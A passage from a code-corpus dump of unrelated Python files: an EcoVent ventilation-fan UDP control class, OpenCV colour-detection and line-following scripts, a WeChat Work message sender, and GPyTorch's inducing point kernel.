return "".join("{:02x}".format(ord(c)) for c in str_msg)
def hex2str(self, hex_msg):
return "".join(
chr(int("0x" + hex_msg[i : (i + 2)], 16)) for i in range(0, len(hex_msg), 2)
)
def hexstr2tuple(self, hex_msg):
return [int(hex_msg[i : (i + 2)], 16) for i in range(0, len(hex_msg), 2)]
def chksum(self, hex_msg):
checksum = hex(sum(self.hexstr2tuple(hex_msg))).replace("0x", "").zfill(4)
byte_array = bytearray.fromhex(checksum)
chksum = hex(byte_array[1]).replace("0x", "").zfill(2) + hex(
byte_array[0]
).replace("0x", "").zfill(2)
return f"{chksum}"
def get_size(self, str):
return hex(len(str)).replace("0x", "").zfill(2)
def get_header(self):
id_size = self.get_size(self._id)
pwd_size = self.get_size(self._password)
id = self.str2hex(self._id)
password = self.str2hex(self._password)
str = f"{self._type}{id_size}{id}{pwd_size}{password}"
return str
def get_params_index(self, value):
for i in self.params:
if self.params[i][0] == value:
return i
def get_write_only_params_index(self, value):
for i in self.write_only_params:
if self.write_only_params[i][0] == value:
return i
def get_params_values(self, idx, value):
index = self.get_params_index(idx)
if index != None:
if self.params[index][1] != None:
for i in self.params[index][1]:
if self.params[index][1][i] == value:
return [index, i]
return [index, None]
else:
return [None, None]
def send(self, data):
self.socket = self.connect()
payload = self.get_header() + data
payload = self.HEADER + payload + self.chksum(payload)
return self.socket.sendall(bytes.fromhex(payload))
def receive(self):
try:
response = self.socket.recv(4096)
return response
except socket.timeout:
return None
def do_func(self, func, param, value=""):
out = ""
parameter = ""
for i in range(0, len(param), 4):
n_out = ""
out = param[i : (i + 4)]
if out == "0077" and value == "":
value = "0101"
if value != "":
val_bytes = int(len(value) / 2)
else:
val_bytes = 0
if out[:2] != "00":
n_out = "ff" + out[:2]
if val_bytes > 1:
n_out += "fe" + hex(val_bytes).replace("0x", "").zfill(2) + out[2:4]
else:
n_out += out[2:4]
parameter += n_out + value
if out == "0077":
value = ""
data = func + parameter
self.send(data)
response = self.receive()
if response:
self.parse_response(response)
self.socket.close()
def update(self):
request = ""
for param in self.params:
request += hex(param).replace("0x", "").zfill(4)
self.do_func(self.func["read"], request)
def set_param(self, param, value):
valpar = self.get_params_values(param, value)
if valpar[0] != None:
if valpar[1] != None:
self.do_func(
self.func["write_return"],
hex(valpar[0]).replace("0x", "").zfill(4),
hex(valpar[1]).replace("0x", "").zfill(2),
)
else:
self.do_func(
self.func["write_return"],
hex(valpar[0]).replace("0x", "").zfill(4),
value,
)
def get_param(self, param):
idx = self.get_params_index(param)
if idx != None:
self.do_func(self.func["read"], hex(idx).replace("0x", "").zfill(4))
# def set_state_on(self):
def turn_on_ventilation(self):
request = "0001"
value = "01"
if self.state == "off":
self.do_func(self.func["write_return"], request, value)
# def set_state_off(self):
def turn_off_ventilation(self):
request = "0001"
value = "00"
if self.state == "on":
self.do_func(self.func["write_return"], request, value)
def set_speed(self, speed: int):
if speed >= 1 and speed <= 3:
request = "0002"
value = hex(speed).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
def set_man_speed_percent(self, speed: int):
if speed >= 2 and speed <= 100:
request = "0044"
value = math.ceil(255 / 100 * speed)
value = hex(value).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
request = "0002"
value = "ff"
self.do_func(self.func["write_return"], request, value)
def set_man_speed(self, speed):
if speed >= 14 and speed <= 255:
request = "0044"
value = speed
value = hex(value).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
request = "0002"
value = "ff"
self.do_func(self.func["write_return"], request, value)
def set_airflow(self, val):
if val >= 0 and val <= 2:
request = "00b7"
value = hex(val).replace("0x", "").zfill(2)
self.do_func(self.func["write_return"], request, value)
def parse_response(self, data):
pointer = 20
# discard header bytes
length = len(data) - 2
pwd_size = data[pointer]
pointer += 1
password = data[pointer:pointer + pwd_size]
pointer += pwd_size
function = data[pointer]
pointer += 1
# from here parsing of parameters begin
payload = data[pointer:length]
response = bytearray()
ext_function = 0
value_counter = 1
high_byte_value = 0
parameter = 1
for p in payload:
if parameter and p == 0xFF:
ext_function = 0xFF
# print ( "def ext:" + hex(0xff) )
elif parameter and p == 0xFE:
ext_function = 0xFE
# print ( "def ext:" + hex(0xfe) )
elif parameter and p == 0xFD:
ext_function = 0xFD
# print ( "dev ext:" + hex(0xfd) )
else:
if ext_function == 0xFF:
high_byte_value = p
ext_function = 1
elif ext_function == 0xFE:
value_counter = p
ext_function = 2
elif ext_function == 0xFD:
None
else:
if parameter == 1:
# print ("appending: " + hex(high_byte_value))
response.append(high_byte_value)
parameter = 0
else:
value_counter -= 1
response.append(p)
if value_counter <= 0:
parameter = 1
value_counter = 1
high_byte_value = 0
setattr(
self,
self.params[int(response[:2].hex(), 16)][0],
response[2:].hex(),
)
response = bytearray()
@property
def name(self):
return self._name
@property
def host(self):
return self._host
@host.setter
def host(self, ip):
try:
socket.inet_aton(ip)
self._host = ip
except socket.error:
sys.exit()
@property
def id(self):
return self._id
@id.setter
def id(self, id):
self._id = id
@property
def password(self):
return self._password
@password.setter
def password(self, pwd):
self._password = pwd
@property
def port(self):
return self._port
@property
def state(self):
return self._state
@state.setter
def state(self, val):
self._state = self.states[int(val)]
@property
def speed(self):
return self._speed
@speed.setter
def speed(self, input):
val = int(input, 16)
self._speed = self.speeds[val]
@property
def boost_status(self):
return self._boost_status
@boost_status.setter
def boost_status(self, input):
val = int(input, 16)
self._boost_status = self.statuses[val]
@property
def timer_mode(self):
return self._timer_mode
@timer_mode.setter
def timer_mode(self, input):
val = int(input, 16)
self._timer_mode = self.timer_modes[val]
@property
def timer_counter(self):
return self._timer_counter
@timer_counter.setter
def timer_counter(self, input):
val = int(input, 16).to_bytes(3, "big")
self._timer_counter = (
str(val[2]) + "h " + str(val[1]) + "m " + str(val[0]) + "s "
)
@property
def humidity_sensor_state(self):
return self._humidity_sensor_state
@humidity_sensor_state.setter
def humidity_sensor_state(self, input):
val = int(input, 16)
self._humidity_sensor_state = self.states[val]
@property
def relay_sensor_state(self):
return self._relay_sensor_state
@relay_sensor_state.setter
def relay_sensor_state(self, input):
val = int(input, 16)
self._relay_sensor_state = self.states[val]
@property
def analogV_sensor_state(self):
return self._analogV_sensor_state
@analogV_sensor_state.setter
def analogV_sensor_state(self, input):
val = int(input, 16)
self._analogV_sensor_state = self.states[val]
@property
def humidity_treshold(self):
return self._humidity_treshold
@humidity_treshold.setter
def humidity_treshold(self, input):
val = int(input, 16)
self._humidity_treshold = str(val) + " %"
@property
def battery_voltage(self):
return self._battery_voltage
@battery_voltage.setter
def battery_voltage(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._battery_voltage = str(val) + " mV"
@property
def humidity(self):
return self._humidity
@humidity.setter
def humidity(self, input):
val = int(input, 16)
self._humidity = str(val) + " %"
@property
def analogV(self):
return self._analogV
@analogV.setter
def analogV(self, input):
val = int(input, 16)
self._analogV = str(val)
@property
def relay_status(self):
return self._relay_status
@relay_status.setter
def relay_status(self, input):
val = int(input, 16)
self._relay_status = self.statuses[val]
@property
def man_speed(self):
return self._man_speed
@man_speed.setter
def man_speed(self, input):
val = int(input, 16)
if val >= 0 and val <= 255:
percentage = int(val / 255 * 100)
self._man_speed = str(percentage) + " %"
# HA implementation
self._attr_percentage = percentage
@property
def fan1_speed(self):
return self._fan1_speed
@fan1_speed.setter
def fan1_speed(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._fan1_speed = str(val) + " rpm"
@property
def fan2_speed(self):
return self._fan2_speed
@fan2_speed.setter
def fan2_speed(self, input):
val = int.from_bytes(
int(input, 16).to_bytes(2, "big"), byteorder="little", signed=False
)
self._fan2_speed = str(val) + " rpm"
@property
def filter_timer_countdown(self):
return self._filter_timer_countdown
@filter_timer_countdown.setter
def filter_timer_countdown(self, input):
val = int(input, 16).to_bytes(3, "big")
self._filter_timer_countdown = (
str(val[2]) + "d " + str(val[1]) + "h " + str(val[0]) + "m "
)
@property
def boost_time(self):
return self._boost_time
@boost_time.setter
def boost_time(self, input):
val = int(input, 16)
self._boost_time = str(val) + " m"
@property
def rtc_time(self):
return self._rtc_time
@rtc_time.setter
def rtc_time(self, input):
val = int(input, 16).to_bytes(3, "big")
self._rtc_time = str(val[2]) + "h " + str(val[1]) + "m " + str(val[0]) + "s "
@property
def rtc_date(self):
return self._rtc_date
@rtc_date.setter
def rtc_date(self, input):
val = int(input, 16).to_bytes(4, "big")
self._rtc_date = (
str(val[1])
+ " 20"
+ str(val[3])
+ "-"
+ str(val[2]).zfill(2)
+ "-"
+ str(val[0]).zfill(2)
)
@property
def weekly_schedule_state(self):
return self._weekly_schedule_state
@weekly_schedule_state.setter
def weekly_schedule_state(self, val):
self._weekly_schedule_state = self.states[int(val)]
@property
def weekly_schedule_setup(self):
return self._weekly_schedule_setup
@weekly_schedule_setup.setter
def weekly_schedule_setup(self, input):
val = int(input, 16).to_bytes(6, "big")
self._weekly_schedule_setup = (
self.days_of_week[val[0]]
+ "/"
+ str(val[1])
+ ": to "
+ str(val[5])
+ "h "
+ str(val[4])
+ "m "
+ self.speeds[val[2]]
)
@property
def device_search(self):
return self._device_search
@device_search.setter
def device_search(self, val):
self._device_search = self.hex2str(val)
@property
def device_password(self):
return self._device_password
@device_password.setter
def device_password(self, val):
self._device_password = self.hex2str(val)
@property
def machine_hours(self):
return self._machine_hours
@machine_hours.setter
def machine_hours(self, input):
val = int(input, 16).to_bytes(4, "big")
self._machine_hours = (
str(int.from_bytes(val[2:3], "big"))
+ "d "
+ str(val[1])
+ "h "
+ str(val[0])
+ "m "
)
@property
def alarm_status(self):
return self._alarm_status
@alarm_status.setter
def alarm_status(self, input):
val = int(input, 16)
self._alarm_status = self.alarms[val]
@property
def cloud_server_state(self):
return self._cloud_server_state
@cloud_server_state.setter
def cloud_server_state(self, input):
val = int(input, 16)
self._cloud_server_state = self.states[val]
@property
def firmware(self):
return self._firmware
@firmware.setter
def firmware(self, input):
val = int(input, 16).to_bytes(6, "big")
self._firmware = (
str(val[0])
+ "."
+ str(val[1])
+ " "
+ str(int.from_bytes(val[4:6], byteorder="little", signed=False))
+ "-"
+ str(val[3]).zfill(2)
+ "-"
+ str(val[2]).zfill(2)
)
@property
def filter_replacement_status(self):
return self._filter_replacement_status
@filter_replacement_status.setter
def filter_replacement_status(self, input):
val = int(input, 16)
self._filter_replacement_status = self.statuses[val]
@property
def wifi_operation_mode(self):
return self._wifi_operation_mode
@wifi_operation_mode.setter
def wifi_operation_mode(self, input):
val = int(input, 16)
self._wifi_operation_mode = self.wifi_operation_modes[val]
@property
def wifi_name(self):
return self._wifi_name
@wifi_name.setter
def wifi_name(self, input):
self._wifi_name = self.hex2str(input)
@property
def wifi_pasword(self):
return self._wifi_pasword
@wifi_pasword.setter
def wifi_pasword(self, input):
self._wifi_pasword = self.hex2str(input)
@property
def wifi_enc_type(self):
return self._wifi_enc_type
@wifi_enc_type.setter
def wifi_enc_type(self, input):
val = int(input, 16)
self._wifi_enc_type = self.wifi_enc_types[val]
@property
def wifi_freq_chnnel(self):
return self._wifi_freq_chnnel
@wifi_freq_chnnel.setter
def wifi_freq_chnnel(self, input):
val = int(input, 16)
self._wifi_freq_chnnel = str(val)
@property
def wifi_dhcp(self):
return self._wifi_dhcp
@wifi_dhcp.setter
def wifi_dhcp(self, input):
val = int(input, 16)
self._wifi_dhcp = self.wifi_dhcps[val]
@property
def wifi_assigned_ip(self):
return self._wifi_assigned_ip
@wifi_assigned_ip.setter
def wifi_assigned_ip(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_assigned_ip = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def wifi_assigned_netmask(self):
return self._wifi_assigned_netmask
@wifi_assigned_netmask.setter
def wifi_assigned_netmask(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_assigned_netmask = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def wifi_main_gateway(self):
return self._wifi_main_gateway
@wifi_main_gateway.setter
def wifi_main_gateway(self, input):
val = int(input, 16).to_bytes(4, "big")
self._wifi_main_gateway = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def curent_wifi_ip(self):
return self._curent_wifi_ip
@curent_wifi_ip.setter
def curent_wifi_ip(self, input):
val = int(input, 16).to_bytes(4, "big")
self._curent_wifi_ip = (
str(val[0]) + "." + str(val[1]) + "." + str(val[2]) + "." + str(val[3])
)
@property
def airflow(self):
return self._airflow
@airflow.setter
def airflow(self, input):
val = int(input, 16)
self._airflow = self.airflows[val]
@property
def analogV_treshold(self):
return self._analogV_treshold
@analogV_treshold.setter
def analogV_treshold(self, input):
val = int(input, 16)
self._analogV_treshold = str(val) + " %"
@property
def unit_type(self):
return self._unit_type
@unit_type.setter
def unit_type(self, input):
val = int(input, 16)
self._unit_type = self.unit_types[val]
@property
def night_mode_timer(self):
return self._night_mode_timer
@night_mode_timer.setter
def night_mode_timer(self, input):
val = int(input, 16).to_bytes(2, "big")
self._night_mode_timer = (
str(val[1]).zfill(2) + "h " + str(val[0]).zfill(2) + "m"
)
@property
def party_mode_timer(self):
return self._party_mode_timer
@party_mode_timer.setter
def party_mode_timer(self, input):
val = int(input, 16).to_bytes(2, "big")
self._party_mode_timer = (
str(val[1]).zfill(2) + "h " + str(val[0]).zfill(2) + "m"
)
@property
def humidity_status(self):
return self._humidity_status
@humidity_status.setter
def humidity_status(self, input):
val = int(input, 16)
self._humidity_status = self.statuses[val]
@property
def analogV_status(self):
return self._analogV_status
@analogV_status.setter
def analogV_status(self, input):
val = int(input, 16)
self._analogV_status = self.statuses[val]
``` |
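For reference, a standalone sketch of the request framing that `get_header()`, `str2hex()`, `chksum()` and `send()` implement above; the device id and password here are hypothetical placeholders:
```python
# Standalone sketch of the EcoVent UDP packet framing: "FDFD" header, then a
# type/id/password block, a function code and parameter bytes, then a
# byte-swapped 16-bit checksum of the byte sum (mirrors chksum() above).
def str2hex(s: str) -> str:
    return "".join("{:02x}".format(ord(c)) for c in s)

def chksum(hex_msg: str) -> str:
    total = sum(int(hex_msg[i:i + 2], 16) for i in range(0, len(hex_msg), 2))
    low, high = total & 0xFF, (total >> 8) & 0xFF
    return "{:02x}{:02x}".format(low, high)

device_id = "0025001122334455"   # hypothetical 16-character device id
password = "1111"                # hypothetical device password
header = "02" + "{:02x}".format(len(device_id)) + str2hex(device_id) \
    + "{:02x}".format(len(password)) + str2hex(password)
data = "01" + "01"               # func "read"; param 0x0001 (state) is sent as its low byte
payload = header + data
packet = "FDFD" + payload + chksum(payload)
print(packet)
```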
{
"source": "49paunilay/OpenCV_Using_Python_For_Absolute_Beginners",
"score": 3
} |
#### File: 49paunilay/OpenCV_Using_Python_For_Absolute_Beginners/colourdetection.py
```python
import cv2
import numpy as np
location ="Resources/a.jpg"
def empty(i):
pass
cv2.namedWindow("Trackbar")
cv2.resizeWindow("Trackbar",640,240)
cv2.createTrackbar("min Hue","Trackbar",0,179,empty)
cv2.createTrackbar("max Hue","Trackbar",179,179,empty)
cv2.createTrackbar("saturation Min","Trackbar",0,255,empty)
cv2.createTrackbar("saturation Max","Trackbar",255,255,empty)
cv2.createTrackbar("Value min","Trackbar",0,255,empty)
cv2.createTrackbar("value max","Trackbar",255,255,empty)
while True:
image=cv2.imread(location)
imagehsv=cv2.cvtColor(image,cv2.COLOR_BGR2HSV)
hminimum =cv2.getTrackbarPos("min Hue","Trackbar")
hmaximum =cv2.getTrackbarPos("max Hue","Trackbar")
saturation_minimum =cv2.getTrackbarPos("saturation Min","Trackbar")
saturation_Maximum = cv2.getTrackbarPos("saturation Max","Trackbar")
value_minimum = cv2.getTrackbarPos("Value min","Trackbar")
value_Maximum = cv2.getTrackbarPos("value max","Trackbar")
# print(hminimum,hmaximum,saturation_minimum,saturation_Maximum,value_minimum,value_Maximum)
lower = np.array([hminimum,saturation_minimum,value_minimum])
upper = np.array([hmaximum,saturation_Maximum,value_Maximum])
mask = cv2.inRange(imagehsv,lower,upper)
resultImage = cv2.bitwise_and(image,image,mask=mask)
cv2.imshow("image",resultImage)
cv2.waitKey(1)
``` |
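A self-contained variant of the same HSV masking, run on a synthetic two-colour image instead of `Resources/a.jpg` so it needs no assets; the bounds below are illustrative values for red:
```python
# HSV range masking on a synthetic image (left half red, right half blue, in BGR).
import cv2
import numpy as np

image = np.zeros((100, 100, 3), dtype=np.uint8)
image[:, :50] = (0, 0, 255)   # red in BGR
image[:, 50:] = (255, 0, 0)   # blue in BGR

hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
lower = np.array([0, 100, 100])      # illustrative lower bound for red
upper = np.array([10, 255, 255])     # illustrative upper bound for red
mask = cv2.inRange(hsv, lower, upper)
result = cv2.bitwise_and(image, image, mask=mask)
print(mask[:, :50].mean(), mask[:, 50:].mean())  # ~255.0 on the red half, 0.0 on the blue half
```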
{
"source": "4a5g0030/color_distinguish",
"score": 3
} |
#### File: 4a5g0030/color_distinguish/main.py
```python
import cv2
import mark_color as mc
import sys
def main():
cap = cv2.VideoCapture(0)
cap.set(3, 1280)
cap.set(4, 720)
color = 0
while True:
ret, frame = cap.read()
frame = cv2.flip(frame, 1)
frame = cv2.GaussianBlur(frame, (5, 5), 1.5)
frame, color_box = mc.mark_color(frame, 72000)
if color == 0:
if color_box[1] != 0:
color = 1
if color_box[2] != 0:
color = 2
cv2.imshow('frame', frame)
p = 'R : ' + str(color_box[0]) + ', G : ' + str(color_box[1]) + ', B : ' + str(
color_box[2]) + " , Lock Color :" + str(color)
if color_box[color] != 0:
p += " ON"
elif color_box[0] != 0:
p += " OFF"
sys.stdout.write('\r' + p)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
def t_one():
img = cv2.imread('test_data/RGB.png')
img, _ = mc.mark_color(img, 30)
cv2.imshow('img', img)
cv2.waitKey(0)
def t_tow():
img = cv2.imread('test_data/test_myroom.jpg')
img, _ = mc.mark_color(img)
cv2.imshow('img', img)
cv2.waitKey(0)
if __name__ == '__main__':
main()
``` |
{
"source": "4a5g0030/ct_findcontours",
"score": 3
} |
#### File: ct_findcontours/src/main.py
```python
import cv2
import os
import json
ROOT_DIR = os.path.join("../")
IMG_DIR = os.path.join(ROOT_DIR, "Images")
JSON_DIR = os.path.join(ROOT_DIR, "Json")
TH_OUT = os.path.join(ROOT_DIR, "th_out")
def find_c(image, filename):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
_, th = cv2.threshold(gray, 70, 255, cv2.THRESH_BINARY)
contours, _ = cv2.findContours(th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 3)
cv2.imwrite(os.path.join(TH_OUT, filename), th)
return image, contours
def main():
image_list = os.listdir(IMG_DIR)
jsonfilename = os.path.splitext(image_list[0])[0] + "to" + os.path.splitext(image_list[len(image_list) - 1])[0] + ".json"
json_open = open(os.path.join(JSON_DIR, jsonfilename), 'w')
json_open.write("{\n}")
json_open.close()
json_file = open(os.path.join(JSON_DIR, jsonfilename), 'r')
json_file_data = json_file.read()
data = json.loads(json_file_data)
for file in image_list:
img = cv2.imread(os.path.join(IMG_DIR, file))
img, contours = find_c(img, file)
for n in range(0, len(contours)):
list_x = []
list_y = []
for point in contours[n]:
for x, y in point:
list_x.append(x)
list_y.append(y)
data[file] = {}
data[file]['all_points_x'] = list_x
data[file]['all_points_y'] = list_y
with open(os.path.join(JSON_DIR, jsonfilename), "w") as file_write:
json.dump(data, file_write, default=int)
if __name__ == '__main__':
main()
``` |
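For reference, a self-contained sketch of the threshold, findContours and point-list extraction that `find_c()` and `main()` perform, run on a synthetic image instead of the `Images` directory (it assumes OpenCV 4, which the two-value `findContours` unpacking above already implies):
```python
# Threshold -> contours -> x/y point lists on a synthetic image with one white blob.
import cv2
import numpy as np

img = np.zeros((100, 100, 3), dtype=np.uint8)
cv2.rectangle(img, (20, 20), (80, 80), (255, 255, 255), -1)

gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
_, th = cv2.threshold(gray, 70, 255, cv2.THRESH_BINARY)
contours, _ = cv2.findContours(th, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)

list_x = [int(x) for x, y in contours[0][:, 0, :]]
list_y = [int(y) for x, y in contours[0][:, 0, :]]
print(len(contours), min(list_x), max(list_x), min(list_y), max(list_y))  # 1 20 80 20 80
```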
{
"source": "4a5g0030/line_follow_p2",
"score": 3
} |
#### File: 4a5g0030/line_follow_p2/line_follow.py
```python
import cv2
import numpy as np
from ShowProcess import ShowProcess
import glob
import time
import matplotlib.pyplot as plt
plt.figure()
def func_time(func):
def ft():
s = time.time()
func()
e = time.time()
print('use time :', e - s)
return ft
def get_contour_center(contour):
m = cv2.moments(contour)
if m["m00"] == 0:
return [0, 0]
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
return [x, y]
def process(image):
_, thresh = cv2.threshold(
image, 125, 255, cv2.THRESH_BINARY_INV)
contours, _ = cv2.findContours(
thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours:
main_contour = max(contours, key=cv2.contourArea)
cv2.drawContours(image, [main_contour], -1, (150, 150, 150), 2)
contour_center = get_contour_center(main_contour)
cv2.circle(image, tuple(contour_center), 2, (150, 150, 150), 2)
return image, contour_center
else:
return image, (0, 0)
def slice_out(im, num):
cont_cent = list()
height, width = im.shape[:2]
sl = int(height / num)
sliced_imgs = list()
for i in range(num):
part = sl * i
crop_img = im[part:part + sl, 0:width]
processed = process(crop_img)
plt.subplot2grid((4, 4), (i, 2), colspan=2, rowspan=1)
plt.axis('off')
plt.imshow(processed[0], cmap="gray")
plt.title(str(i) + ", " + str(processed[1]))
sliced_imgs.append(processed[0])
cont_cent.append(processed[1])
return sliced_imgs, cont_cent
def repack(images):
im = images[0]
for i in range(len(images)):
if i == 0:
im = np.concatenate((im, images[1]), axis=0)
if i > 1:
im = np.concatenate((im, images[i]), axis=0)
return im
@func_time
def main():
img_in_root = 'test_data/image/'
img_out_root = 'test_data/pltoutput/'
img_count = len(glob.glob(img_in_root + '*jpg'))
process_bar = ShowProcess(img_count, 'OK!')
no_slice = 4
for x in range(img_count):
img = cv2.imread(img_in_root + str(x).zfill(3) + '.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
plt.subplot2grid((4, 4), (0, 0), colspan=2, rowspan=2)
plt.axis('off')
plt.imshow(img, cmap="gray")
plt.title("Gray")
slices, cont_cent = slice_out(img, no_slice)
img = repack(slices)
plt.subplot2grid((4, 4), (2, 0), colspan=2, rowspan=2)
plt.axis('off')
plt.imshow(img, cmap='gray')
plt.title("Finish")
plt.savefig(img_out_root + str(x).zfill(3) + '.jpg')
# cv2.imwrite(img_out_root + str(x).zfill(3) + '.jpg', img)
process_bar.show_process()
if __name__ == '__main__':
main()
``` |
{
"source": "4admin2root/devopssec",
"score": 3
} |
#### File: media/weixin/weixin_send.py
```python
import urllib,urllib2
import json
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def gettoken():
CropID='wwdae'
Secret='<KEY>'
URL="https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid="+CropID+"&corpsecret="+Secret
token_file = urllib2.urlopen(URL)
token_data = token_file.read().decode('utf-8')
token_json = json.loads(token_data)
token_json.keys()
return token_json['access_token']
def sendmsg(access_token,username,content):
URL="https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token="+access_token
send_values = {
"touser":username,
"msgtype":"text",
"agentid":1000024,
"text":{
"content":content
}
}
send_data = json.dumps(send_values, ensure_ascii=False)
send_request = urllib2.Request(URL, send_data)
urllib2.urlopen(send_request)
if __name__ == '__main__':
username = str(sys.argv[1])
content = str(sys.argv[3])
f = open('/tmp/weixin.log','a')
f.write(str(sys.argv[1:]))
f.close()
accesstoken = gettoken()
sendmsg(accesstoken,username,content)
``` |
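The script above targets Python 2 (`urllib2`, `reload(sys)`). A hedged Python 3 sketch of the same two calls using `requests`; the endpoints come from the script, while the corp id, secret and agent id remain placeholders:
```python
# Python 3 sketch of the WeChat Work (qyapi.weixin.qq.com) token + send-message flow.
import requests

def get_token(corp_id: str, secret: str) -> str:
    url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
    resp = requests.get(url, params={"corpid": corp_id, "corpsecret": secret})
    return resp.json()["access_token"]

def send_msg(token: str, user: str, content: str, agent_id: int) -> dict:
    url = "https://qyapi.weixin.qq.com/cgi-bin/message/send"
    payload = {"touser": user, "msgtype": "text", "agentid": agent_id,
               "text": {"content": content}}
    return requests.post(url, params={"access_token": token}, json=payload).json()
```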
{
"source": "4aHxKzD/gpytorch",
"score": 2
} |
#### File: gpytorch/kernels/inducing_point_kernel.py
```python
import copy
import math
import torch
from ..distributions import MultivariateNormal
from ..lazy import DiagLazyTensor, LowRankRootAddedDiagLazyTensor, LowRankRootLazyTensor, MatmulLazyTensor, delazify
from ..mlls import InducingPointKernelAddedLossTerm
from ..models import exact_prediction_strategies
from ..utils.cholesky import psd_safe_cholesky
from .kernel import Kernel
class InducingPointKernel(Kernel):
def __init__(self, base_kernel, inducing_points, likelihood, active_dims=None):
super(InducingPointKernel, self).__init__(active_dims=active_dims)
self.base_kernel = base_kernel
self.likelihood = likelihood
if inducing_points.ndimension() == 1:
inducing_points = inducing_points.unsqueeze(-1)
self.register_parameter(name="inducing_points", parameter=torch.nn.Parameter(inducing_points))
self.register_added_loss_term("inducing_point_loss_term")
def _clear_cache(self):
if hasattr(self, "_cached_kernel_mat"):
del self._cached_kernel_mat
@property
def _inducing_mat(self):
if not self.training and hasattr(self, "_cached_kernel_mat"):
return self._cached_kernel_mat
else:
res = delazify(self.base_kernel(self.inducing_points, self.inducing_points))
if not self.training:
self._cached_kernel_mat = res
return res
@property
def _inducing_inv_root(self):
if not self.training and hasattr(self, "_cached_kernel_inv_root"):
return self._cached_kernel_inv_root
else:
chol = psd_safe_cholesky(self._inducing_mat, upper=True)
eye = torch.eye(chol.size(-1), device=chol.device, dtype=chol.dtype)
inv_root = torch.triangular_solve(eye, chol)[0]
res = inv_root
if not self.training:
self._cached_kernel_inv_root = res
return res
def _get_covariance(self, x1, x2):
k_ux1 = delazify(self.base_kernel(x1, self.inducing_points))
if torch.equal(x1, x2):
covar = LowRankRootLazyTensor(k_ux1.matmul(self._inducing_inv_root))
# Diagonal correction for predictive posterior
if not self.training:
correction = (self.base_kernel(x1, x2, diag=True) - covar.diag()).clamp(0, math.inf)
covar = LowRankRootAddedDiagLazyTensor(covar, DiagLazyTensor(correction))
else:
k_ux2 = delazify(self.base_kernel(x2, self.inducing_points))
covar = MatmulLazyTensor(
k_ux1.matmul(self._inducing_inv_root), k_ux2.matmul(self._inducing_inv_root).transpose(-1, -2)
)
return covar
def _covar_diag(self, inputs):
if inputs.ndimension() == 1:
inputs = inputs.unsqueeze(1)
# Get diagonal of covar
covar_diag = delazify(self.base_kernel(inputs, diag=True))
return DiagLazyTensor(covar_diag)
def forward(self, x1, x2, diag=False, **kwargs):
covar = self._get_covariance(x1, x2)
if self.training:
if not torch.equal(x1, x2):
raise RuntimeError("x1 should equal x2 in training mode")
zero_mean = torch.zeros_like(x1.select(-1, 0))
new_added_loss_term = InducingPointKernelAddedLossTerm(
MultivariateNormal(zero_mean, self._covar_diag(x1)),
MultivariateNormal(zero_mean, covar),
self.likelihood,
)
self.update_added_loss_term("inducing_point_loss_term", new_added_loss_term)
if diag:
return covar.diag()
else:
return covar
def num_outputs_per_input(self, x1, x2):
return self.base_kernel.num_outputs_per_input(x1, x2)
def __deepcopy__(self, memo):
replace_inv_root = False
replace_kernel_mat = False
if hasattr(self, "_cached_kernel_inv_root"):
replace_inv_root = True
kernel_inv_root = self._cached_kernel_inv_root
if hasattr(self, "_cached_kernel_mat"):
replace_kernel_mat = True
kernel_mat = self._cached_kernel_mat
cp = self.__class__(
base_kernel=copy.deepcopy(self.base_kernel),
inducing_points=copy.deepcopy(self.inducing_points),
likelihood=self.likelihood,
active_dims=self.active_dims,
)
if replace_inv_root:
cp._cached_kernel_inv_root = kernel_inv_root
if replace_kernel_mat:
cp._cached_kernel_mat = kernel_mat
return cp
def prediction_strategy(self, train_inputs, train_prior_dist, train_labels, likelihood):
# Allow for fast variances
return exact_prediction_strategies.SGPRPredictionStrategy(
train_inputs, train_prior_dist, train_labels, likelihood
)
``` |
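For context, a minimal SGPR usage sketch built around this kernel; it assumes a recent GPyTorch release where the class is exposed as `gpytorch.kernels.InducingPointKernel` with the constructor shown above:
```python
# Sketch: sparse GP regression model using InducingPointKernel (SGPR).
import torch
import gpytorch

class SGPRModel(gpytorch.models.ExactGP):
    def __init__(self, train_x, train_y, likelihood):
        super().__init__(train_x, train_y, likelihood)
        self.mean_module = gpytorch.means.ConstantMean()
        base_kernel = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())
        # 20 inducing points initialized from the training inputs
        self.covar_module = gpytorch.kernels.InducingPointKernel(
            base_kernel, inducing_points=train_x[:20].clone(), likelihood=likelihood
        )

    def forward(self, x):
        return gpytorch.distributions.MultivariateNormal(
            self.mean_module(x), self.covar_module(x)
        )

train_x = torch.linspace(0, 1, 100).unsqueeze(-1)
train_y = torch.sin(6 * train_x).squeeze(-1) + 0.05 * torch.randn(100)
likelihood = gpytorch.likelihoods.GaussianLikelihood()
model = SGPRModel(train_x, train_y, likelihood)
```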
{
"source": "4AI/langml",
"score": 3
} |
#### File: langml/langml/activations.py
```python
import math
from langml import keras, K
from langml.tensor_typing import Tensors
def gelu(x: Tensors) -> Tensors:
